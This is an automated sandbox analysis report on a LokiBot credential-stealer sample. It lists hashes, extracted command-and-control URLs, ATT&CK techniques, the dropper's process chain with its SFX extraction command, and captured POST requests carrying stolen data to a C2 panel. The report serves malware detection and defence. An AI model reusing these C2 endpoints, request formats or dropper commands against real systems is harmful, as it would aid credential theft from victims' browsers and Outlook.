lokibot | f66e2b6d93b2fe125c0c770926286c63716cb0538bf4e4bf6c47eff67b39b207

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
02/08/2024, 12:46 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e9d26537e90ed16f25562af4e1f32d67.exe
Size

750KB
MD5

e9d26537e90ed16f25562af4e1f32d67
SHA1

12815966f19753f9fa7035179138b449dc0281b3
SHA256

f66e2b6d93b2fe125c0c770926286c63716cb0538bf4e4bf6c47eff67b39b207
SHA512

0ecb24fe955c34fcf0ec3addb4813302c5fcc9c882ecbfcccb03c1657a94754073247d81d81f556e2ad3907adaa381a4607d12fc69dabd8637e09ba989941b31
SSDEEP

12288:UcrNS33L10QdrXPMztnIQ0oZCkv6JkDTziH4nIAdL+tFiZsQTZjWR7Tyr5W4uO3w:vNA3R5drXPUtI0ZCkvTOUN+tFimQq7TR

Score

10^/10

lokibot collection credential_access discovery spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.66.169:5334/drhwttsg/Panel/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation	e9d26537e90ed16f25562af4e1f32d67.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation	dxhdxtx.sfx.exe

Executes dropped EXE 4 IoCs

pid	Process
3524	dxhdxtx.sfx.exe
1468	dxhdxtx.exe
2804	dxhdxtx.exe
2240	dxhdxtx.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dxhdxtx.exe
Key opened	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	dxhdxtx.exe
Key opened	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dxhdxtx.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1468 set thread context of 2804	1468	dxhdxtx.exe	93
PID 1468 set thread context of 2240	1468	dxhdxtx.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxhdxtx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9d26537e90ed16f25562af4e1f32d67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxhdxtx.sfx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxhdxtx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxhdxtx.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	dxhdxtx.exe
Token: SeDebugPrivilege	2804	dxhdxtx.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 2116	4812	e9d26537e90ed16f25562af4e1f32d67.exe	85
PID 4812 wrote to memory of 2116	4812	e9d26537e90ed16f25562af4e1f32d67.exe	85
PID 4812 wrote to memory of 2116	4812	e9d26537e90ed16f25562af4e1f32d67.exe	85
PID 2116 wrote to memory of 3524	2116	cmd.exe	89
PID 2116 wrote to memory of 3524	2116	cmd.exe	89
PID 2116 wrote to memory of 3524	2116	cmd.exe	89
PID 3524 wrote to memory of 1468	3524	dxhdxtx.sfx.exe	91
PID 3524 wrote to memory of 1468	3524	dxhdxtx.sfx.exe	91
PID 3524 wrote to memory of 1468	3524	dxhdxtx.sfx.exe	91
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2804	1468	dxhdxtx.exe	93
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94
PID 1468 wrote to memory of 2240	1468	dxhdxtx.exe	94

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dxhdxtx.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dxhdxtx.exe

C:\Users\Admin\AppData\Local\Temp\e9d26537e90ed16f25562af4e1f32d67.exe
"C:\Users\Admin\AppData\Local\Temp\e9d26537e90ed16f25562af4e1f32d67.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dystsdf.cmd" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Users\Admin\AppData\Local\Temp\dxhdxtx.sfx.exe
    dxhdxtx.sfx.exe -prftgyhujiksdyethnymkdesppodtyuhngfszafugyRhvqxsdfHbgnmeG -dC:\Users\Admin\AppData\Local\Temp
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe
      "C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2804
    - - C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2240

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

13.107.21.237

dual-a-0034.a-msedge.net

IN A

204.79.197.237
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1F03C62EFB5D60A621BDD2E1FAE661B6; domain=.bing.com; expires=Wed, 27-Aug-2025 12:46:08 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1B1BC2FE19DD43FFA14D1842350A6A74 Ref B: LON04EDGE0821 Ref C: 2024-08-02T12:46:08Z
date: Fri, 02 Aug 2024 12:46:08 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1F03C62EFB5D60A621BDD2E1FAE661B6

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=mEES14wWE2WPaQuatOaKttC8oV9TQJhkc3AffZbGabw; domain=.bing.com; expires=Wed, 27-Aug-2025 12:46:09 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2BD6317E975141639B506BD698027FF1 Ref B: LON04EDGE0821 Ref C: 2024-08-02T12:46:09Z
date: Fri, 02 Aug 2024 12:46:08 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1F03C62EFB5D60A621BDD2E1FAE661B6; MSPTC=mEES14wWE2WPaQuatOaKttC8oV9TQJhkc3AffZbGabw

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C8AE4811A7B6495C84AAD601139357DB Ref B: LON04EDGE0821 Ref C: 2024-08-02T12:46:09Z
date: Fri, 02 Aug 2024 12:46:08 GMT
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

237.21.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.21.107.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR
POST

http://94.156.66.169/drhwttsg/Panel/five/fre.php

dxhdxtx.exe

Remote address:

94.156.66.169:5334

Request

POST /drhwttsg/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.66.169
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: C4255DA8
Content-Length: 358
Connection: close

Response

HTTP/1.1 404 Not Found

Server: nginx/1.10.3
Date: Fri, 02 Aug 2024 12:46:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3
POST

http://94.156.66.169/drhwttsg/Panel/five/fre.php

dxhdxtx.exe

Remote address:

94.156.66.169:5334

Request

POST /drhwttsg/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.66.169
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: C4255DA8
Content-Length: 180
Connection: close

Response

HTTP/1.1 404 Not Found

Server: nginx/1.10.3
Date: Fri, 02 Aug 2024 12:46:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3
POST

http://94.156.66.169/drhwttsg/Panel/five/fre.php

dxhdxtx.exe

Remote address:

94.156.66.169:5334

Request

POST /drhwttsg/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.66.169
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: C4255DA8
Content-Length: 153
Connection: close

Response

HTTP/1.1 404 Not Found

Server: nginx/1.10.3
Date: Fri, 02 Aug 2024 12:46:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3
DNS

169.66.156.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.66.156.94.in-addr.arpa

IN PTR

Response
DNS

169.66.156.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.66.156.94.in-addr.arpa

IN PTR
DNS

169.66.156.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.66.156.94.in-addr.arpa

IN PTR
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

147.142.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.142.123.92.in-addr.arpa

IN PTR

Response

147.142.123.92.in-addr.arpa

IN PTR

a92-123-142-147deploystaticakamaitechnologiescom
DNS

240.143.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.143.123.92.in-addr.arpa

IN PTR

Response

240.143.123.92.in-addr.arpa

IN PTR

a92-123-143-240deploystaticakamaitechnologiescom
POST

http://94.156.66.169/drhwttsg/Panel/five/fre.php

dxhdxtx.exe

Remote address:

94.156.66.169:5334

Request

POST /drhwttsg/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.66.169
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: C4255DA8
Content-Length: 153
Connection: close

Response

HTTP/1.1 404 Not Found

Server: nginx/1.10.3
Date: Fri, 02 Aug 2024 12:47:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
POST

http://94.156.66.169/drhwttsg/Panel/five/fre.php

dxhdxtx.exe

Remote address:

94.156.66.169:5334

Request

POST /drhwttsg/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.66.169
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: C4255DA8
Content-Length: 153
Connection: close

Response

HTTP/1.1 404 Not Found

Server: nginx/1.10.3
Date: Fri, 02 Aug 2024 12:48:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3

13.107.21.237:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

tls, http2

2.0kB
9.3kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=3d32ff1f4ee342b5813365ff303f1583&localId=w:36DD875D-6C25-9F5D-2F60-33A75051A872&deviceId=6966569283218577&anid=

HTTP Response

204
94.156.66.169:5334

http://94.156.66.169/drhwttsg/Panel/five/fre.php

http

dxhdxtx.exe

979 B
421 B
8
6

HTTP Request

POST http://94.156.66.169/drhwttsg/Panel/five/fre.php

HTTP Response

404
94.156.66.169:5334

http://94.156.66.169/drhwttsg/Panel/five/fre.php

http

dxhdxtx.exe

703 B
421 B
6
6

HTTP Request

POST http://94.156.66.169/drhwttsg/Panel/five/fre.php

HTTP Response

404
94.156.66.169:5334

http://94.156.66.169/drhwttsg/Panel/five/fre.php

http

dxhdxtx.exe

676 B
429 B
6
6

HTTP Request

POST http://94.156.66.169/drhwttsg/Panel/five/fre.php

HTTP Response

404
94.156.66.169:5334

http://94.156.66.169/drhwttsg/Panel/five/fre.php

http

dxhdxtx.exe

676 B
429 B
6
6

HTTP Request

POST http://94.156.66.169/drhwttsg/Panel/five/fre.php

HTTP Response

404
94.156.66.169:5334

http://94.156.66.169/drhwttsg/Panel/five/fre.php

http

dxhdxtx.exe

676 B
429 B
6
6

HTTP Request

POST http://94.156.66.169/drhwttsg/Panel/five/fre.php

HTTP Response

404

8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

13.107.21.237

204.79.197.237
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

237.21.107.13.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

237.21.107.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

55.36.223.20.in-addr.arpa

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

169.66.156.94.in-addr.arpa

dns

216 B
132 B
3
1

DNS Request

169.66.156.94.in-addr.arpa

DNS Request

169.66.156.94.in-addr.arpa

DNS Request

169.66.156.94.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

147.142.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

147.142.123.92.in-addr.arpa
8.8.8.8:53

240.143.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

240.143.123.92.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dxhdxtx.exe

Filesize
440KB

MD5
9d97e40f246a22c78416163279aad01a

SHA1
f46fa5fe0e12916f6aaa35a19b0d574e6f998ba5

SHA256
ae5f664f2ea4ee2f17f982ff26c07830731c9538082e4fe0e8c163f74c344fec

SHA512
e526bbe49e74d3ca7585ad69f217d1d8564b01653e16e1b91974d0655e1fd8402283abac9ff5ac3d5691f64bd4683534a741988e2833c4a02788bcdd96c41831

Download Submit
C:\Users\Admin\AppData\Local\Temp\dxhdxtx.sfx.exe

Filesize
603KB

MD5
c262db4467562a1e02020ecdd446458f

SHA1
fb6c57b0a5c8b44b0f6cb72f95b7326e1bf73515

SHA256
86d62d5b64db382099df415cfa3ecf27956a62e11f234d46da39dfdad1e57886

SHA512
ab1f050deab9839b0c7a32a8abff1a759e527ce544d7620e3cfba0ba751414d80cec82d9cfee0de553cc00b73e3935a2455fabbc2bfc9e7f1842397772e73b83

Download Submit
C:\Users\Admin\AppData\Local\Temp\dystsdf.cmd

Filesize
18KB

MD5
bf1a918642590a76003144e08deba52c

SHA1
2b13fb7934e631854bff56137523b943ad9634a9

SHA256
d0e8950b3ded0fed3088d5fc6c5ebbfd71f9ef5d13374d3c1b451b5f9776f032

SHA512
c72e35061477cb4a9633f0f57677afd38722c9c7598cfcc1a7d506e990e7846f55efe89c3cc1a34e689a89842ae76ba190b093c20c7db5ca25470e4dd5c0e578

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2077438316-259605770-1264560426-1000\0f5007522459c86e95ffcc62f32308f1_8ed3c59f-d7fe-4993-aee3-a17c2cac2de1

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2077438316-259605770-1264560426-1000\0f5007522459c86e95ffcc62f32308f1_8ed3c59f-d7fe-4993-aee3-a17c2cac2de1

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
memory/1468-23-0x0000000002680000-0x0000000002686000-memory.dmp

Filesize
24KB

Download
memory/1468-25-0x00000000050F0000-0x000000000518C000-memory.dmp

Filesize
624KB

Download
memory/1468-26-0x00000000026E0000-0x00000000026E6000-memory.dmp

Filesize
24KB

Download
memory/1468-27-0x0000000009470000-0x0000000009A14000-memory.dmp

Filesize
5.6MB

Download
memory/1468-28-0x0000000008900000-0x0000000008992000-memory.dmp

Filesize
584KB

Download
memory/1468-24-0x0000000004D30000-0x0000000004DA8000-memory.dmp

Filesize
480KB

Download
memory/1468-22-0x0000000000470000-0x00000000004E6000-memory.dmp

Filesize
472KB

Download
memory/2804-31-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2804-29-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2804-54-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2804-62-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.